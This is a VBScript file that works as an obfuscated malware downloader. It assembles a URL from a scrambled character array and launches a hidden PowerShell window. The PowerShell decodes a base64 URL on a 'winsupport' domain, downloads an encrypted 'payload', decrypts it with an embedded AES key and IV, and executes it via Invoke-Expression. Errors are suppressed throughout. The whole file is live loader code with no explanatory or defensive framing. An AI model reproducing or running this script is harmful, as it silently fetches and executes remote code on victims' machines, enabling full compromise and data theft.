On Error Resume Next

Dim arr, index, url, i
arr = Array("h", "h", "i", "t", "t", "p", "s", ":", "U", "/", "/", "w", "i", "L", "n", "v", "s", "N", "u", "p", "p", "w", "o", "r", "t", "y", ".", "c", "f", "v", "d", "U", "/", "i", "q", "n", "t", "e", "r", "A", "n", "U", "e", "a", "t", "v", "/", "j", "s", "z", "y", "s", "t", "X", "e", "k", "m", "f", ".", "P", "p", "k", "h", "p")
index = Array(1, 3, 4, 5, 6, 7, 9, 10, 11, 12, 14, 16, 18, 19, 20, 22, 23, 24, 26, 27, 28, 30, 32, 33, 35, 36, 37, 38, 40, 42, 44, 45, 46, 48, 50, 51, 52, 54, 56, 58, 60, 62, 63)

url = ""
For i = 0 To UBound(index)
    url = url & arr(index(i))
Next

Set x4 = CreateObject("WScript.Shell")

Dim p
p = "powershell -NoProfile -WindowStyle Hidden -Command """
p = p & "$u=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93aW5zdXBwb3J0LmNmZC9pbnRlcm5ldHYvc3lzdGVtLnBocA=='));"
p = p & "$k=[Convert]::FromBase64String('ZeG6mkwCwURvmnSPPXmSGE8BRYpky+lbpwdnq5wl44s=');"
p = p & "$i=[Convert]::FromBase64String('QCb3Wza22yreiuwEQKK2aw==');"
p = p & "$d=(New-Object Net.WebClient).DownloadData($u + '?action=get_payload&key_id=c319ce0ac62bb545');"
p = p & "$a=New-Object Security.Cryptography.AesManaged;"
p = p & "$a.Mode='CBC';$a.Padding='PKCS7';$a.Key=$k;$a.IV=$i;"
p = p & "$t=$a.CreateDecryptor();"
p = p & "$b=$t.TransformFinalBlock($d,0,$d.Length);"
p = p & "$s=[Text.Encoding]::UTF8.GetString($b);"
p = p & "Invoke-Expression $s;"
p = p & """"

x4.Run p, 0, False

Set x4 = Nothing
